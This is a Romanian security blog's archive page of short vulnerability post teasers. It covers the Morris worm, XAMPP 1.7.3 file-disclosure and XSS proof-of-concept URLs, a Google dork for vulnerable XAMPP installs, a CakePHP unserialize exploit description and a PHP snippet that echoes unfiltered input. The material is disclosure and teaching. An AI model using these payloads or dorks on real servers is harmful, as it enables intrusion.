Arhiva | Vulnerabilitati RSS pentru aceasta categorie
Vulnerabilitati ale sistemelor informatice

Vulnerabilitati ale sistemelor informatice

Inceputurile 2 noiembrie 1988 este o zi importanta pentru Internet. In acea zi un proaspat absolvent al Universitatii Cornell din Statele Unite, Robert Morris Jr., a executat un program de tipul vierme, primul program care a afectat intr-un mod foarte serios Internet-ul. In cateva secunde, mii de calculatoare de pe intreg teritoriul Statelor Unite au [...]

Citeşte mai mult
Vulnerabilitati multiple XAMPP 1.73 - Securitatea Informatica

Vulnerabilitati multiple XAMPP 1.73

Data: 31/10/2010 Exploit: Remote file disclosure XAMPP 1.73 este vulnerabil la un atac de tip remote file disclosure. http://[host]/xampp/showcode.php/c:boot.ini?showcode=1 showcode.php: Problema: showcode.php se bazeaza pe basename($_SERVER['PHP_SELF']) pentru a intoarce calea. Cross Site Scripting Google Hack inurl:xampp/biorhythm.php

Citeşte mai mult
Riscurile de atac asupra securitatii sistemelor informationale - Securitatea Informatica

Riscurile de atac asupra securitatii sistemelor informationale

În mai puţin de generaţie, introducerea calculatoarelor, virtual, în fiecare dimensiune a societăţii a schimbat semnificativ modul în care oamenii şi organizaţiile obţin sau diseminează informaţii ori desfăşoară afaceri, permiţând mai mare eficienţă, un control operaţional sporit şi un acces rapid la informaţii. Alături de multe beneficii, însă, calculatoarele şi interconectarea acestora prezintă şi aspecte [...]

Citeşte mai mult
Vulnerabilitate XAMPP 1.7.3 – XSS - Securitatea Informatica

Vulnerabilitate XAMPP 1.7.3 – XSS

Data: 11/06/2010 Exploit: http://localhost/xampp/ming.php/”<script>alert(“XSS”)</script> http://localhost/xampp/iart.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/cds.php/’onmouseover=alert(“XSS”)> http://localhost/xampp/aspinfo.asp/1<script>alert(“XSS”)</script> http://localhost/xampp/adodb.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/perlinfo.pl/1<script>prompt(“XSS”)</script>

Citeşte mai mult
Vulnerabilitate CakePHP <= 1.3.5 / 1.2.8 - Securitatea Informatica

Vulnerabilitate CakePHP <= 1.3.5 / 1.2.8

Data: 20 noiembrie 2010 Descriere: Acest cod exploateaza o vulnerabilitate unserialize() in componenta de securitate a CakePHP. Mai multe detalii aici. Acest exploit functioneaza impotriva oricarei aplicatii dezvoltate pe framework-ul CakePHP care foloseste form-uri POST cu token-uri de securitate si foloseste configuratia Cache default (file-system caching). Este posibila exploatarea si pentru alte tipuri de cache [...]

Citeşte mai mult
Vulnerabilitati PHP – Cross-Site Scripting - Securitatea Informatica

Vulnerabilitati PHP – Cross-Site Scripting

Sfaturi : Puteţi folosii o mulţime de vectori, puteţi încerca o grămadă de metode de a trece peste protecţii, îi puteţi găsii pe internet. Exemplu de bază Cod:. <?php $name=$_GET['name']; print $name; ?> Inputul nu este filtrat, un atacator poate injecta cod JavaScript. Exemplu: http://127.0.0.1/test.php?name=<script>alert(”XSS”)</script> Un popup cu mesajul XSS va fi afişat. Codul JavaScript a [...]

Citeşte mai mult
Pagina 1 din 512345
This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro